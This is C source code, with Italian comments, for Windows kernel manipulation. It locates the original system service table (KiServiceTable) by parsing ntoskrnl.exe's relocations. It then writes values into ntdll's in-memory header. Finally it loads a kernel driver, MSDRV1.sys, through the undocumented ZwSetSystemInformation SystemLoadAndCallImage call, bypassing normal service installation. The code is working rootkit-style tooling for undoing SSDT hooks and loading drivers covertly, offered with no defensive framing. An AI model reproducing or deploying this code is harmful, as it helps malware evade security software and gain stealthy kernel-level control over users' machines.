typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR  Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;

typedef unsigned long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

NTSTATUS (__stdcall *ZwSetSystemInformation)(
  IN DWORD SystemInformationClass,
  IN OUT PVOID SystemInformation,
  IN ULONG SystemInformationLength
  );

VOID (__stdcall *RtlInitUnicodeString)(
  IN OUT PUNICODE_STRING  DestinationString,
  IN PCWSTR  SourceString
  );

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
 UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
#define ibaseDD *(PDWORD)&ibase
#define MAGIC 0x30090000
#define DRIVER_PATH "\\??\\"
#define DRIVER_NAME "\\system32\\MSDRV1.sys"

typedef struct {
    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;


DWORD GetHeaders(PCHAR ibase,
                PIMAGE_FILE_HEADER *pfh,
                PIMAGE_OPTIONAL_HEADER *poh,
                PIMAGE_SECTION_HEADER *psh)

{
    PIMAGE_DOS_HEADER mzhead = (PIMAGE_DOS_HEADER)ibase;
    
    if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE) || (ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE))
		return FALSE;
    
    *pfh = (PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
    if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) 
        return FALSE;

    *pfh = (PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
    
    *poh = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
    if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC)
        return FALSE;
    
    *psh = (PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
    return TRUE;
}


DWORD FindKiServiceTable(HMODULE hModule, DWORD dwKSDT)
{
    PIMAGE_FILE_HEADER     pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER  psh;
    PIMAGE_BASE_RELOCATION pbr;
    PIMAGE_FIXUP_ENTRY     pfe;    
    
    DWORD dwFixups = 0, i, dwPointerRva, dwPointsToRva, dwKiServiceTable;
    BOOL  bFirstChunk;

    if (!GetHeaders((PCHAR)hModule, &pfh, &poh, &psh))
		return 0;

    // Cerca nella lista dei reloc per trovare la mov di inizializzazione
    if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
        (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {
        
        pbr = (PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress, hModule);

        bFirstChunk = TRUE;
        while (bFirstChunk || pbr->VirtualAddress) {
            bFirstChunk = FALSE;
            pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

            for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
				DWORD gino = (pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;
                if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
                    dwFixups++;
                    dwPointerRva=pbr->VirtualAddress+pfe->offset;
                    dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

					if (dwPointsToRva==dwKSDT) {
                        if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7) {
                            dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
                            return dwKiServiceTable;
                        }
                    }                  
                } 
            }
            *(PDWORD)&pbr += pbr->SizeOfBlock;
        }
    }    
    return 0;
}

void a2w(char *src, char *dst)
{
	DWORD i=0;
	do {
		dst[i*2] = src[i];
		dst[i*2+1] = 0;
	} while(src[i++]);
}

BOOL LoadDriver()
{
	SYSTEM_LOAD_AND_CALL_IMAGE mod_image;
	char comp_path[512];
	char sys_path[260];
	char wcomp_path[1024];

	if (GetEnvironmentVariable("SystemRoot", sys_path, sizeof(sys_path)) == 0)
		return FALSE;
	sprintf(comp_path, "%s%s%s", DRIVER_PATH, sys_path, DRIVER_NAME);
	a2w(comp_path, wcomp_path);

	if (!(RtlInitUnicodeString = (void (__stdcall *)(PUNICODE_STRING,PCWSTR)) GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString")))
		return FALSE;

	if (!(ZwSetSystemInformation = (NTSTATUS (__stdcall *)(DWORD,PVOID,ULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation")))
		return FALSE;
	RtlInitUnicodeString( &(mod_image.ModuleName), (PCWSTR)wcomp_path);

	if (!NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage, &mod_image, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
		return FALSE;

	return TRUE;
}

BOOL doUnhook()
{    
    HMODULE hKernel;
    DWORD   dwKSDT;              
    DWORD   dwKiServiceTable;    
    DWORD   dwServices = 0;
    PDWORD  pService;
	DWORD   dummy;
	DWORD   *fix_add;
    PIMAGE_FILE_HEADER     pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER  psh;

    // Carica ntoskrnl come dll
	if ( !(hKernel = LoadLibraryEx("ntoskrnl.exe", 0, DONT_RESOLVE_DLL_REFERENCES)) )  
        return FALSE;        
	
	if (!(dwKSDT = (DWORD)GetProcAddress(hKernel, "KeServiceDescriptorTable"))) {
	    FreeLibrary(hKernel);
        return FALSE;
	}
 
    // Prende l'RVA di KeServiceDescriptorTable...
    dwKSDT -= (DWORD)hKernel;    
    // ...e cerca l'indirizzo alla ServiceTable tramite le reloc
	if (!(dwKiServiceTable = FindKiServiceTable(hKernel, dwKSDT))) {
	    FreeLibrary(hKernel);
        return FALSE;
	}

	// Legge la preferred base del kernel
	if (!GetHeaders((PCHAR)hKernel, &pfh, &poh, &psh)) {
		FreeLibrary(hKernel);
		return FALSE;
	}
	// e cerca il numero di entry nella sdt originale
	for (pService = (PDWORD)((DWORD)hKernel + dwKiServiceTable);
         *pService - poh->ImageBase < poh->SizeOfImage;
		 pService++, dwServices++);

    FreeLibrary(hKernel);

	// Scrive i parametri nell'header di ntdll
	fix_add = (DWORD *)GetModuleHandle("ntdll.dll");
	if (!VirtualProtect(fix_add, 64, PAGE_EXECUTE_READWRITE, &dummy))
		return FALSE;

	fix_add += 7;
	*fix_add = dwKiServiceTable;
	fix_add++;
	*fix_add = (dwServices | MAGIC);

	// Carica il driver
	return LoadDriver();
}
